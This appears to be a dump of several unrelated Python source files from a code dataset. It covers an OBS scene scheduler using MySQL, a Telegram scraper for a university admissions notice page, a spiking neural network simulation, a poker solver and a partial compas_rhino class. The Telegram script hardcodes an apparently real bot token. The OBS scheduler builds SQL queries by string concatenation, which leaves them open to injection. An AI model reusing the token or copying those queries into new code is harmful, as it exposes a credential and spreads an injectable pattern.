import timedelta \nimport socket\nimport websocket #pip install websocket-client\nimport hashlib\nimport base64\nimport json\nimport mysql.connector #pip install mysql-connector-python\nfrom mysql.connector import Error\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\n\n\n#MariaDB settings. Port = 3306 or 3307\nmysqlconfig = {\n 'user': 'user',\n 'password': 'pass',\n 'host': 'localhost',\n 'port': '3306',\n 'database': 'OBSdb',\n 'raise_on_warnings': True\n}\n\nwritelog = 0\n\nargs = sys.argv[1:]\nif len(args):\n\tCW = args[0]\n\tif CW == '-l':\n\t\twritelog = 1\n\t\tprint (\"Logfile will be made.\")\n\nif writelog:\n\tlogging.basicConfig(filename=time.strftime(\"%Y%m%d%H%M%S\") + '.log', level=logging.INFO)\n\tlogging.info('Started')\n \ntry:\n\tconnection = mysql.connector.connect(**mysqlconfig)\n\tif connection.is_connected():\n\t\tdb_Info = connection.get_server_info()\n\t\tprint(\"Connected to MySQL Server version \", db_Info)\n\t\tif writelog:\n\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Connected to MySQL Server version \" + db_Info)\n\t\tmycursor = connection.cursor(dictionary=True)\n\t\tmycursor.execute(\"SELECT * FROM host\")\n\t\trecords = mycursor.fetchall()\n\t\tfor row in records:\n\t\t\thost = row[\"hostname\"]\n\t\t\tport = row[\"port\"]\n\t\t\tpassword = row[\"pass\"]\nexcept Error as e:\n\tprint(\"Error while connecting to MySQL\", e)\n\tif writelog:\n\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Error while connecting to MySQL\" + e)\n\t\ntry:\n\tconnectionthread = mysql.connector.connect(**mysqlconfig)\n\tif connectionthread.is_connected():\n\t\tdb_Info = connectionthread.get_server_info()\n\t\tprint(\"Thread connected to MySQL Server version \", db_Info)\n\t\tif writelog:\n\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Thread connected to MySQL Server version \" + db_Info)\nexcept Error as e:\n\tprint(\"Error while connecting to MySQL\", e)\n\tif writelog:\n\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Error while connecting thread to MySQL\" + e)\n\n\nStudioMode = False\nobsconnected = False\nexporttime = [0,500,1000,1500,2000,2500,3000,3500,4000,4500,5000,5500]\n#exporttime = [0,1000,2000,3000,4000,5000] # every hour at mmss. 100 = 1 minute after each hour, 1500 = 15 minutes after each hour.\n#[0,1000,2000,3000,4000,5000] = export every 10 minutes\nGetAuthRequired = {\"request-type\" : \"GetAuthRequired\" ,\"message-id\" : \"1\"};\nGetStudioModeStatus = {\"request-type\" : \"GetStudioModeStatus\" , \"message-id\" : \"GetStudioModeStatus\"}\nGetSceneList = {\"request-type\" : \"GetSceneList\" , \"message-id\" : \"getSceneList\"}\nGetSourcesList = {\"request-type\" : \"GetSourcesList\" , \"message-id\" : \"GetSourcesList\"}\nGetTransitionList = {\"request-type\": \"GetTransitionList\",\"message-id\" : \"GetTransitionList\"}\n\nwhile True:\n\ttry:\n\t\tdef on_message(ws, message):\n\t\t\tdata = json.loads(message)\n\t\t\t#print (data[\"message-id\"])\n\t\t\t#print (data)\n\t\t\tglobal obsconnected\n\t\t\tif \"error\" in data:\n\t\t\t\tif (data[\"error\"] == \"Authentication Failed.\"):\n\t\t\t\t\tprint(\"Authentication Failed.\")\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Authentication Failed.\")\n\t\t\t\t\tws.keep_running = False\n\t\t\t\telse:\n\t\t\t\t\tprint (data)\n\t\t\t\t\tmessage = str(data)\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + message)\n\t\t\telif \"message-id\" in data:\n\t\t\t\tif (data[\"message-id\"] == \"GetStudioModeStatus\"):\n\t\t\t\t\tglobal StudioMode\n\t\t\t\t\tStudioMode = data[\"studio-mode\"]\n\t\t\t\telif (data[\"message-id\"] == \"getSceneList\"):\n\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE scenenames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE sourcenames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tfor name in data['scenes']:\n\t\t\t\t\t\tscene = name['name']\n\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\tqry = \"INSERT INTO scenenames(scene) VALUES('\" + scene + \"')\"\n\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\tconnection.commit()\n\t\t\t\t\t\tfor name in name['sources']:\n\t\t\t\t\t\t\tsourcename = name['name']\n\t\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\t\tqry = \"INSERT INTO sourcenames(scene,source) VALUES('\" + scene + \"' , '\" + sourcename + \"')\"\n\t\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\t\tconnection.commit()\n\t\t\t\telif (data[\"message-id\"] == \"GetTransitionList\"):\n\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\tmycursor.execute(\"TRUNCATE TABLE transitionnames\")\n\t\t\t\t\tconnection.commit()\n\t\t\t\t\tfor i in data['transitions']:\n\t\t\t\t\t\ttrans_type = i['name']\n\t\t\t\t\t\tif not connection.is_connected():\n\t\t\t\t\t\t\tconnection.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\tmycursor = connection.cursor()\n\t\t\t\t\t\tqry = \"INSERT INTO transitionnames(transition) VALUES('\" + trans_type + \"')\"\n\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\tconnection.commit()\n\t\t\t\telif (data[\"message-id\"] == \"SetCurrentTransition\"):\n\t\t\t\t\tprint(\"SetCurrentTransition\")\n\t\t\t\t#elif (data[\"authRequired\"]):\n\t\t\t\telif (data[\"message-id\"] == \"1\"):\n\t\t\t\t\tprint(\"Authentication required\")\n\t\t\t\t\tsecret = base64.b64encode(hashlib.sha256((password + data['salt']).encode('utf-8')).digest())\n\t\t\t\t\tauth = base64.b64encode(hashlib.sha256(secret + data['challenge'].encode('utf-8')).digest()).decode('utf-8')\n\t\t\t\t\tauth_payload = {\"request-type\": \"Authenticate\", \"message-id\": \"2\", \"auth\": auth}\n\t\t\t\t\tws.send(json.dumps(auth_payload))\n\t\t\t\t\tobsconnected = True\n\t\t\t\telif (data[\"message-id\"] == \"2\"):\n\t\t\t\t\tprint(\"Login pass\")\n\t\t\t\telif (data[\"message-id\"] == \"SetCurrentScene\") or (data[\"message-id\"] == \"SetSceneItemProperties\") or (data[\"message-id\"] == \"SetPreviewScene\") :\n\t\t\t\t\tTrue\n\t\t\t\telse:\n\t\t\t\t\tprint(data)\n\t\t\t\t\tmessage = str(data)\n\t\t\t\t\tif writelog:\n\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + message)\n\t\t\t\t\tobsconnected = True\n\t\t\telif \"update-type\" in message:\n\t\t\t\tif (data[\"update-type\"] == \"StudioModeSwitched\"):\n\t\t\t\t\tStudioMode = data[\"new-state\"]\n\n\t\tdef on_error(ws, error):\n\t\t\tprint(error)\n\t\t\tif writelog:\n\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + str(error))\n\t\t\tws.close()\n\n\t\tdef on_close(ws):\n\t\t\tprint(\"On Close Connection error.\")\n\t\t\tif writelog:\n\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": On Close Connection error.\")\n\t\t\t#stop on_open while loop\n\t\t\tglobal obsconnected\n\t\t\tobsconnected = False\n\t\t\tws.keep_running = False\n\t\t\ttime.sleep(30)\n\n\t\tdef on_open(ws):\n\t\t\tdef run(*args):\n\t\t\t\tws.send(json.dumps(GetAuthRequired))\n\t\t\t\ttime.sleep(2)\n\t\t\t\tif ws.sock:\n\t\t\t\t\tws.send(json.dumps(GetStudioModeStatus))\n\t\t\t\t\tglobal obsconnected\n\t\t\t\t\tweekdays = (\"ma\",\"di\",\"wo\",\"do\",\"vr\",\"za\",\"zo\") #Dutch\n\t\t\t\t\twhile obsconnected == True:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tdayrun = False\n\t\t\t\t\t\t\tcurrentdtime = time.strftime(\"%Y%m%d%H%M%S\",time.localtime())\n\t\t\t\t\t\t\ttimenow = time.strftime(\"%H:%M:%S\",time.localtime())\n\t\t\t\t\t\t\tif not connectionthread.is_connected():\n\t\t\t\t\t\t\t\tconnectionthread.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\tmycursor = connectionthread.cursor(dictionary=True)\n\t\t\t\t\t\t\tgetqry = \"SELECT * FROM schedules WHERE processed = 0\"\n\t\t\t\t\t\t\tmycursor.execute(getqry)\n\t\t\t\t\t\t\trecords = mycursor.fetchall()\n\t\t\t\t\t\t\tprint(time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\tfor row in records:\n\t\t\t\t\t\t\t\tlogrow = str(row)\n\t\t\t\t\t\t\t\tid = row[\"id\"]\n\t\t\t\t\t\t\t\tswtime = row[\"swtime\"]\n\t\t\t\t\t\t\t\tswdate = row[\"swdate\"]\n\t\t\t\t\t\t\t\ttime_object = datetime.strptime(str(swtime), '%H:%M:%S').time()\n\t\t\t\t\t\t\t\tdate_object = datetime.strptime(str(swdate), '%Y-%m-%d').date()\n\t\t\t\t\t\t\t\tdatetime_str = datetime.combine(date_object , time_object)\n\t\t\t\t\t\t\t\tdtime = datetime_str.strftime(\"%Y%m%d%H%M%S\")\n\t\t\t\t\t\t\t\tscene = row[\"scene\"]\n\t\t\t\t\t\t\t\ttrans_type = row[\"transition\"]\n\t\t\t\t\t\t\t\tsourceoff = row[\"sourceoff\"] #source in this scene to switch off\n\t\t\t\t\t\t\t\tsourceon = row[\"sourceon\"] #source in this scene to switch on\n\t\t\t\t\t\t\t\trepeattime = row[\"repeattime\"]\n\t\t\t\t\t\t\t\tscenesourceoff = row[\"scenesourceoff\"]\n\t\t\t\t\t\t\t\tscenesourceon = row[\"scenesourceon\"]\n\t\t\t\t\t\t\t\tif timenow == datetime_str.strftime(\"%H:%M:%S\"):\n\t\t\t\t\t\t\t\t\tif weekdays[datetime.today().weekday()] in repeattime:\n\t\t\t\t\t\t\t\t\t\tdayrun = True\n\t\t\t\t\t\t\t\tif currentdtime == dtime or dayrun:\n\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logrow)\n\t\t\t\t\t\t\t\t\tif len(sourceon) > 0:\n\t\t\t\t\t\t\t\t\t\t#first set correct scene in preview\n\t\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetPreviewScene\" , \"message-id\" : \"SetPreviewScene\" , \"scene-name\" : scenesourceon};\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\t#set source properties\n\t\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetSceneItemProperties\" , \"message-id\" : \"SetSceneItemProperties\" , \"scene-name\" : scenesourceon , \"item\" : sourceon , \"visible\": True };\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tif len(sourceoff) > 0:\n #delay,else to fast for OBS\n\t\t\t\t\t\t\t\t\t\ttime.sleep(2)\n\t\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetPreviewScene\" , \"message-id\" : \"SetPreviewScene\" , \"scene-name\" : scenesourceoff};\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetSceneItemProperties\" , \"message-id\" : \"SetSceneItemProperties\" , \"scene-name\" : scenesourceoff , \"item\" : sourceoff , \"visible\": False };\n\t\t\t\t\t\t\t\t\t\tlogmessage = str(message)\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": \" + logmessage)\n\t\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tmessage={\"request-type\" : \"SetCurrentTransition\" , \"message-id\" : \"SetCurrentTransition\" ,\"transition-name\":trans_type};\n\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\tmessage = {\"request-type\" : \"SetCurrentScene\" , \"message-id\" : \"SetCurrentScene\" , \"scene-name\" : scene};\n\t\t\t\t\t\t\t\t\tws.send(json.dumps(message))\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tif not connectionthread.is_connected():\n\t\t\t\t\t\t\t\t\t\tconnectionthread.reconnect(attempts=5, delay=0)\n\t\t\t\t\t\t\t\t\tmycursor = connectionthread.cursor()\n\t\t\t\t\t\t\t\t\tif len(repeattime) > 0 and not dayrun:\n\t\t\t\t\t\t\t\t\t\tif \",\" in repeattime:\n\t\t\t\t\t\t\t\t\t\t\trepeattimenew = repeattime.split(',')[0]\n\t\t\t\t\t\t\t\t\t\t\trepeattimenumber = repeattime.split(',')[1]\n\t\t\t\t\t\t\t\t\t\t\tif repeattimenumber == \"0\": #continuous\n\t\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattimenew))\n\t\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate ='\" + new_date_object.strftime(\"%Y-%m-%d\") + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\t\telif repeattimenumber == \"1\": #last run was done\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET processed = 1 WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattimenew))\n\t\t\t\t\t\t\t\t\t\t\t\trepeattime = repeattimenew + \",\" + str(int(repeattimenumber) - 1)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate = '\" + new_date_object.strftime(\"%Y-%m-%d\") + \"', repeattime = '\" + repeattime + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\t\tnewdtime = datetime_str + timedelta(minutes=int(repeattime))\n\t\t\t\t\t\t\t\t\t\t\tnew_time_object = datetime.time(newdtime)\n\t\t\t\t\t\t\t\t\t\t\tnew_date_object = datetime.date(newdtime)\n\t\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET swtime = '\" + new_time_object.strftime(\"%H:%M:%S\") + \"', swdate ='\" + new_date_object.strftime(\"%Y-%m-%d\") + \"' WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tqry = \"UPDATE schedules SET processed = 1 WHERE id = \" + str(id) + \";\"\n\t\t\t\t\t\t\t\t\tif not dayrun:\n\t\t\t\t\t\t\t\t\t\tmycursor.execute(qry)\n\t\t\t\t\t\t\t\t\t\tconnectionthread.commit()\n\t\t\t\t\t\t\t\t\tprint(\"Transition to: \" + scene + \" at \" + time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\t\t\tif writelog:\n\t\t\t\t\t\t\t\t\t\tlogging.info(time.strftime(\"%Y%m%d%H%M%S\") + \": Transition to: \" + scene + \" at \" + time.strftime(\"%H:%M:%S\",time.localtime()))\n\t\t\t\t\t\t\t\t\ttime.sleep(1) #wait for next second.\n\t\t\t\t\t\t\tconnectionthread.close()\n\t\t\t\t\t\t\ttime.sleep(0.25) #no need 100's loops a second\n\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\tprint(\"connectionthread error\")\n\t\t\t\t\t\t\tconnectionthread.close()\n\t\t\t\t\t\t\tif writelog:\n\t\t\t\t\t\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": connectionthread error\")\n\t\t\t\t\t\t\ttime.sleep(10)\n\t\t\t\t\t\ttimenow = int(time.strftime(\"%M%S\",time.localtime()))\n\t\t\t\t\t\tif timenow in exporttime:\n\t\t\t\t\t\t\tprint(\"export scenes\")\n\t\t\t\t\t\t\tws.send(json.dumps(GetSceneList))\n\t\t\t\t\t\t\tUpdatescenes = False\n\t\t\t\t\t\t\ttime.sleep(0.25)\n\t\t\t\t\t\tif timenow - 10 in exporttime:\n\t\t\t\t\t\t\tprint(\"export transitions\")\n\t\t\t\t\t\t\tws.send(json.dumps(GetTransitionList))\n\t\t\t\t\t\t\ttime.sleep(0.25)\n\t\t\tthread.start_new_thread(run, ())\n\n\t\tif __name__ == \"__main__\":\n\t\t\t#websocket.enableTrace(True)\n\t\t\tws = websocket.WebSocketApp(\"ws://{}:{}\".format(host, port),on_message = on_message,on_error = on_error,on_close = on_close)\n\t\t\tws.on_open = on_open\n\t\t\tws.run_forever()\n\n\texcept Exception:\n\t\tprint(\"Exception Connection error\")\n\t\tif writelog:\n\t\t\tlogging.warning(time.strftime(\"%Y%m%d%H%M%S\") + \": Exception Connection error\")\n\t\ttime.sleep(10)\n\n\n\n\n\n","sub_path":"obsschedulermySQL.py","file_name":"obsschedulermySQL.py","file_ext":"py","file_size_in_byte":13499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"10839188","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nimport telegram\n\nmy_token = '509374426:AAHLko_Iht5oulMOo8tBTAbd52vYyFL8GwU'\nbot = telegram.Bot(token=my_token)\nupdate = bot.get_updates()\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nreq = requests.get('http://admission.cau.ac.kr/iphak/notice.htm?bbsid=notice&ctg_cd=entry')\nreq.encoding = 'euc-kr'\n\nhtml = req.text\nsoup = BeautifulSoup(html, 'html.parser')\nposts = soup.select('div.article > div > table > tbody > tr > td.al > a')\nsave = posts[-1].text\n\n# for i in posts:ㅇ\n# # print(i)\n# print(i.text)\n\nwith open(os.path.join(BASE_DIR, 'cau.txt'), 'r+') as f_read:\n before = f_read.readline()\n if before != save:\n bot.sendMessage(chat_id='384222529', text='중앙대 편입학 새공지가 있습니다.')\n bot.sendMessage(chat_id='384222529', text='http://admission.cau.ac.kr/iphak/notice.htm?bbsid=notice&ctg_cd=entry')\n\n with open(os.path.join(BASE_DIR, 'cau.txt'), 'w+') as f_write:\n f_write.write(save)\n f_write.close()\n\n f_read.close()\n","sub_path":"transfer_cau.py","file_name":"transfer_cau.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"623757362","text":"import wave\r\nfrom pyaudio import PyAudio,paInt16\r\n\r\n# 录制的音频质量参数\r\nframerate=16000\r\nNUM_SAMPLES=2000\r\nchannels=1\r\nsampwidth=2\r\nTIME=16 #单位为s,实际录音时间会缩小两倍\r\n\r\n# 录音函数\r\ndef save_wave_file(param, my_buf):\r\n pass\r\n\r\n\r\ndef start():\r\n pa=PyAudio()\r\n stream=pa.open(format = paInt16,channels=1,\r\n rate=framerate,input=True,\r\n frames_per_buffer=NUM_SAMPLES)\r\n my_buf=[]\r\n count=0\r\n while count= 0)\n x = x * (x <= 1)\n x = x + (1-x)/tau_x * dt\n x = x * (x >= 0)\n x = x * (x <= 1)\n\n J[:n_exc, :n_exc] = J_EE * x\n\n exc_input = np.dot(J[:, :n_exc], b_last_spike[:n_exc])\n inh_input = np.dot(J[:, n_exc:], b_last_spike[n_exc:])\n exc_input = exc_input + g_ext\n\n # update conductance\n g_inh = g_inh + (-g_inh / float(tau_gaba)) * dt + inh_input\n g_ampa = g_ampa + (-g_ampa / float(tau_ampa)) * dt + exc_input\n g_nmda = g_nmda + ((-g_nmda + g_ampa) / float(tau_nmda)) * dt\n g_exc = alpha * g_ampa + (1 - alpha) * g_nmda\n\n # seperate inhibitory and excitatory\n v[:n_exc] = v[:n_exc] + ((v_rest - v[:n_exc]) + g_exc[:n_exc] * (v_exc - v[:n_exc]) + g_inh[:n_exc] * (v_inh - v[:n_exc])) / float(tau_m_e) * dt\n v[n_exc:] = v[n_exc:] + ((v_rest - v[n_exc:]) + g_exc[n_exc:] * (v_exc - v[n_exc:]) + g_inh[n_exc:] * (v_inh - v[n_exc:])) / float(tau_m_i) * dt\n\n spike_info = (v > v_thr) & (t > t_allow_spike)\n spike_neuron_idx = np.where(spike_info)[0]\n spike_neuron_exc_idx = set(np.arange(0, n_exc, 1)).intersection(spike_neuron_idx)\n spike_neuron_inh_idx = set(np.arange(n_exc, n_exc+n_inh, 1)).intersection(spike_neuron_idx)\n pre_spike_time[spike_neuron_idx] = t\n t_allow_spike[spike_neuron_idx] = t + t_ref\n v[spike_neuron_idx] = v_spike_rest # reset membrane potential\n\n spike_mat[:, idx] = b_last_spike\n idx += 1\n if (i+1)%10000==0:\n fr_idx = int((i+1)/10000)-1\n plt.figure(figsize=(figure_len, figure_width))\n ax = plt.gca()\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.spines['bottom'].set_visible(True)\n ax.spines['left'].set_visible(True)\n for axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(line_width)\n plt.tick_params(width=line_width, length=tick_len)\n\n for i in range(n_exc+n_inh):\n spike_bins = np.where(spike_mat[i, :] != 0)[0]\n if i < n_exc:\n plt.plot(spike_bins, np.ones(len(spike_bins))*i, 'bo', markersize=5) # excitatory neurons\n else:\n plt.plot(spike_bins, np.ones(len(spike_bins))*i, 'ro', markersize=5)\n\n spike_mat_total[:, fr_idx*10000:(fr_idx+1)*10000] = spike_mat\n fr = np.sum(spike_mat, 1)\n firing_mat[:, fr_idx] = np.copy(fr)\n plt.xticks(np.arange(0, 10000 + 2000, 2000), [0, 0.2, 0.4, 0.6, 0.8, 1.0], fontsize=font_size_1, **hfont)\n plt.yticks(np.arange(0, 500+50, 100), fontsize=font_size_1, **hfont)\n plt.xlabel('Time (s)', fontsize=font_size_1, **hfont)\n plt.ylabel('Neurons', fontsize=font_size_1, **hfont)\n plt.xlim([0, 10000])\n plt.ylim([0, 500])\n plt.savefig('paper_figures/png/Fig_6S_Spiking_neural_networks_EE_STP_' + str(int(t)) + '.png')\n sio.savemat('data/spiking_neural_network/Fig_6S_Spiking_neural_networks_EE_STP_' + str(int(t)) + '.mat', mdict={'spike_mat': spike_mat})\n spike_mat = np.zeros((n_exc+n_inh, 10000))\n idx = 0\n\nplt.figure(figsize=(figure_len, figure_width))\nax = plt.gca()\nax.spines['top'].set_visible(False)\nax.spines['right'].set_visible(False)\nax.spines['bottom'].set_visible(True)\nax.spines['left'].set_visible(True)\nfor axis in ['top', 'bottom', 'left', 'right']:\n ax.spines[axis].set_linewidth(line_width)\nplt.tick_params(width=line_width, length=tick_len)\n\nfor i in range(n_exc + n_inh):\n spike_bins = np.where(spike_mat_total[i, :] != 0)[0]\n if i < n_exc:\n plt.plot(spike_bins, np.ones(len(spike_bins)) * i, 'bo', markersize=2) # excitatory neurons\n else:\n plt.plot(spike_bins, np.ones(len(spike_bins)) * i, 'ro', markersize=2)\n\nplt.xticks(np.arange(0, 60000 + 10000, 20000), [0, 2, 4, 6], fontsize=font_size_1, **hfont)\nplt.yticks(np.arange(0, 500 + 50, 100), fontsize=font_size_1, **hfont)\nplt.xlabel('Time (s)', fontsize=font_size_1, **hfont)\nplt.ylabel('Neurons', fontsize=font_size_1, **hfont)\nplt.xlim([0, 60000])\nplt.ylim([0, 500])\nplt.savefig('paper_figures/png/Fig_6S_Spiking_neural_networks_EE_STP_total.png')","sub_path":"src/Fig_6S_Spiking_neural_networks_2D_EE_STP.py","file_name":"Fig_6S_Spiking_neural_networks_2D_EE_STP.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"49951532","text":"#!/usr/bin/env python\nimport time\nstart_time = time.time() \n\nf = open(\"poker.txt\").read()\n\nhands = [line.split(' ') for line in f.splitlines()]\n\n\n# Hand scores\n#---------------------------\n# 1 points: High card\n# 2 points: Pair\n# 3 points: Two pair\n# 4 points: Three of a kind\n# 5 points: Straight\n# 6 points: Flush\n# 7 points: Full House\n# ---------------------------- \n# None by inspection\n# ---------------------------- \n# 8 points: Four of a kind\n# 9 points: Straight flush\n# 10 points: Royal flush\n\n\ndef my_integer(string):\n\n face_cards = ['T', 'J', 'Q', 'K', 'A']\n try:\n return int(string)\n\n except:\n for i, card in enumerate(face_cards):\n if string == card:\n return i + 10\n\n\ndef score(hand):\n\n # Assume high card til u find something else\n score = 1\n\n if is_full_house(hand):\n score = 7\n\n elif is_flush(hand):\n score = 6\n\n elif is_straight(hand):\n score = 5\n\n elif is_three_of_a_kind(hand):\n score = 4\n\n elif is_two_pair(hand):\n score = 3\n\n elif is_one_pair(hand):\n score = 2\n\n return score\n\n\ndef compare_hands(hand1, hand2):\n\n score1 = score(hand1)\n score2 = score(hand2)\n\n if score1 == score2 and score1 == 1:\n values1 = [my_integer(card[0]) for card in hand1]\n values2 = [my_integer(card[0]) for card in hand2]\n\n return int(max(values1) > max(values2))\n\n elif score1 == score2 and score1 == 2:\n pair1 = is_one_pair(hand1)\n pair2 = is_one_pair(hand2)\n return int(pair1 > pair2)\n\n else:\n return int(score1 > score2)\n\n\ndef is_full_house(hand):\n # This only works because there are no 4-of-a-kinds\n values = sorted([my_integer(card[0]) for card in hand])\n return int(len(set(values)) == 2)\n\n\ndef is_flush(hand):\n # No royal flushes or straight flushes by inspection\n # Two regular flushes though\n suits = [card[1] for card in hand]\n return all(i == suits[0] for i in suits)\n\n\ndef is_straight(hand):\n # Looks like there are about 12 of these \n values = sorted([my_integer(card[0]) for card in hand])\n straight = range(values[0], values[0] + 5)\n return all([i == j for i, j in zip(straight, values)])\n\n\ndef is_three_of_a_kind(hand):\n values = [my_integer(card[0]) for card in hand]\n\n for i in range(3):\n if values.count(values[i]) == 3:\n return True\n\n else:\n return False\n\n\ndef is_two_pair(hand):\n values = [my_integer(card[0]) for card in hand]\n return int(len(set(values)) == 3) # Since we've already tested for 3-of-a-kind\n\n\ndef is_one_pair(hand):\n\n values = [my_integer(card[0]) for card in hand]\n\n if len(set(values)) != 4:\n return 0\n\n else:\n for i in range(4):\n if values.count(values[i]) == 2:\n return values[i]\n\n\n# Count number of times player 1 wins\ncount = 0\nfor i, line in enumerate(hands):\n hand1, hand2 = line[:5], line[5:]\n count += compare_hands(hand1, hand2)\n\nend_time = time.time() \nrun_time = end_time - start_time\n\nprint(\"--------------------------------------------\")\nprint(\"| Solution to Project Euler problem 54: |\" )\nprint(\"--------------------------------------------\")\nprint(\"Answer: {:d}\".format(count) )\nprint(\"Wall time: {:3.3f} seconds\".format(run_time) )\n","sub_path":"54/54.py","file_name":"54.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"553210195","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport compas_rhino\nfrom compas_rhino.artists import Artist\n\n__all__ = [\"PrimitiveArtist\"]\n\n\nclass PrimitiveArtist(Artist):\n \"\"\"Base class for all artists for ``compas.geometry.Primitive``.\n\n Parameters\n ----------\n primitive: :class:`compas.geometry.Primitive`\n The instance of the primitive.\n name : str, optional\n The name of the primitive object.\n color : 3-tuple, optional\n The RGB color specification of the object.\n layer : str, optional\n The parent layer of the object.\n\n Attributes\n ----------\n primitive: :class:`compas.geometry.Primitive`\n A reference to the geometry of the primitive.\n\n \"\"\"\n\n __module__ = \"compas_rhino.artists\"\n\n def __init__(self, primitive, name=None, color=None, layer=None):\n super(PrimitiveArtist, self).__init__()\n self.primitive = primitive\n self.name = name\n self.color = color\n self.layer = layer\n\n @classmethod\n def from_data(cls, data):\n module, attr = data['dtype'].split('/')\n Primitive = getattr(__import__(module, fromlist=[attr]), attr)\n primitive = 